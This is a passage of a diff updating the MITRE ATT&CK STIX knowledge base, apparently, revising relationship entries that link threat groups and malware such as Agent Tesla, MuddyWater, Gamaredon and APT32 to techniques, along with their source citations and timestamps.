"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5",
"type": "relationship",
- "modified": "2020-03-23T16:14:53.746Z",
+ "modified": "2020-06-29T01:54:53.350Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -66075,18 +67131,23 @@
],
"external_references": [
{
- "source_name": "Fortinet Agent Tesla April 2018",
+ "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.",
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
- "description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
+ "source_name": "Fortinet Agent Tesla April 2018"
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) obfuscates its code in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) has had its code obfuscated in an apparent attempt to make analysis difficult.(Citation: Fortinet Agent Tesla April 2018) [Agent Tesla](https://attack.mitre.org/software/S0331) has used the Rijndael symmetric encryption algorithm to encrypt strings.(Citation: Malwarebytes Agent Tesla April 2020)",
"id": "relationship--4d7e8d98-9894-4dfa-9013-af8d83e6faea",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.300Z",
+ "modified": "2020-05-28T23:41:03.778Z",
"created": "2019-01-29T18:44:04.939Z"
},
{
@@ -66709,16 +67770,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.639Z",
+ "modified": "2020-04-21T23:09:31.048Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -66899,27 +67960,6 @@
"modified": "2020-03-17T00:19:38.025Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--d36e441f-3455-4373-a1e9-be28f3d50c76",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Magic Hound](https://attack.mitre.org/groups/G0059) sent malicious attachments to victims over email, including an Excel spreadsheet containing macros to download Pupy.(Citation: SecureWorks Mia Ash July 2017)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- }
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
- "type": "relationship",
- "modified": "2019-09-09T19:21:42.307Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--83cfa11e-f221-4dc4-b184-943c2c7f4562",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -67290,12 +68330,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--4438ba64-0cd2-46e9-8a67-c685bf9b404c",
@@ -67617,28 +68657,33 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
- "modified": "2020-03-26T18:13:00.752Z",
+ "modified": "2020-05-26T15:02:19.963Z",
"created": "2017-05-31T21:33:27.019Z"
},
{
"id": "relationship--c63c7dc5-e374-4bf0-9839-0f940ac6d46c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can communicate over HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can communicate over HTTP for C2.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "TrendMicro Gamaredon April 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/",
+ "description": "Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T01:23:05.084Z",
+ "modified": "2020-06-22T17:55:32.004Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -67694,29 +68739,34 @@
"target_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
},
{
- "source_name": "FireEye MuddyWater Mar 2018",
+ "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
- "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+ "source_name": "FireEye MuddyWater Mar 2018"
},
{
- "source_name": "ClearSky MuddyWater Nov 2018",
+ "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018."
+ "source_name": "ClearSky MuddyWater Nov 2018"
},
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
- "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)",
+ "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater June 2019)",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.094Z",
+ "modified": "2020-05-18T18:28:00.134Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -67864,12 +68914,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2015-120123-5521-99"
}
],
- "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--76bd87d6-517e-4294-b4c5-a5a01308bf35",
@@ -68020,7 +69070,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
- "modified": "2018-10-17T00:14:20.652Z",
+ "modified": "2020-04-29T22:01:48.243Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -68155,12 +69205,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--c9412068-a35c-4be3-9945-a1f69f2f77db",
@@ -68335,27 +69385,6 @@
"modified": "2019-04-24T23:18:53.242Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--5bb39b9d-3651-4cdf-80b1-9d88b2062258",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) has used TCP port 8080 for C2.(Citation: Palo Alto Shamoon Nov 2016)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "source_name": "Palo Alto Shamoon Nov 2016",
- "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
- }
- ],
- "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-04-24T23:59:16.304Z",
- "created": "2017-12-14T16:46:06.044Z"
- },
{
"id": "relationship--cf9e7512-c510-4605-9035-f60335c351f4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -68616,12 +69645,12 @@
"url": "http://www.symantec.com/security_response/writeup.jsp?docid=2015-020623-0740-99&tabid=2"
}
],
- "source_ref": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--37dd9a3c-dd52-4541-be7c-b490d026305c",
@@ -68632,16 +69661,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.993Z",
+ "modified": "2020-05-12T22:13:16.875Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -68679,12 +69708,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688"
},
{
"id": "relationship--a7744970-817e-43c6-89e4-86907ac20361",
@@ -68784,16 +69813,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-16T17:46:56.997Z",
+ "modified": "2020-05-12T22:13:16.851Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -68852,12 +69881,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--b9c05069-a05f-4b74-9b4d-275c64f2e124",
@@ -69024,22 +70053,26 @@
{
"id": "relationship--f9773935-853e-4d5e-9345-9587fd77340d",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords from a list that is obtained from the C2 as a text file. It also collects information about installed software.(Citation: DustySky)",
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) scans the victim for files that contain certain keywords and document types including PDF, DOC, DOCX, XLS, and XLSX, from a list that is obtained from the C2 as a text file. It can also identify logical drives for the infected machine.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
+ },
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.162Z",
+ "modified": "2020-05-14T15:14:33.557Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -69432,7 +70465,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -69440,7 +70473,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.334Z",
+ "modified": "2020-06-22T17:54:15.746Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -69771,7 +70804,7 @@
{
"id": "relationship--79057890-3cd0-4124-8b35-b86db6b4f9d7",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks.(Citation: Volexity OceanLotus Nov 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -69780,13 +70813,18 @@
"source_name": "Volexity OceanLotus Nov 2017",
"description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.",
"url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-18T19:33:54.985Z",
+ "modified": "2020-06-19T20:04:12.428Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -69800,14 +70838,19 @@
"target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
"external_references": [
{
- "source_name": "Unit 42 MuddyWater Nov 2017",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/",
"description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
- "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+ "source_name": "Unit 42 MuddyWater Nov 2017"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
- "description": "(Citation: Unit 42 MuddyWater Nov 2017)",
+ "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"type": "relationship",
- "modified": "2019-06-28T15:30:59.088Z",
+ "modified": "2020-05-18T19:46:02.259Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -70041,22 +71084,27 @@
{
"id": "relationship--935f9bb6-d38d-42d1-a764-6b5110ad5364",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Word vulnerability CVE-2014-4114 for execution.(Citation: Symantec Tick Apr 2016)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.320Z",
+ "modified": "2020-06-24T01:27:31.912Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -70089,7 +71137,7 @@
],
"external_references": [
{
- "url": "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf",
+ "url": "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
"description": "RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.",
"source_name": "RSA Shell Crew"
}
@@ -70098,7 +71146,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"type": "relationship",
- "modified": "2019-03-22T20:09:34.778Z",
+ "modified": "2020-04-17T21:11:30.420Z",
"created": "2017-05-31T21:33:27.044Z"
},
{
@@ -70482,12 +71530,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c"
},
{
"id": "relationship--5c736aad-9847-4059-9d1e-dc2f551952d0",
@@ -70613,16 +71661,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.077Z",
+ "modified": "2020-05-12T22:13:16.802Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -70634,7 +71682,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -70643,7 +71691,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.229Z",
+ "modified": "2020-04-16T19:41:40.653Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -70712,7 +71760,7 @@
{
"id": "relationship--4e88ec20-d309-440d-a685-0d2abdc1d7ef",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve OS name/architecture and computer/domain name information from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -70721,13 +71769,18 @@
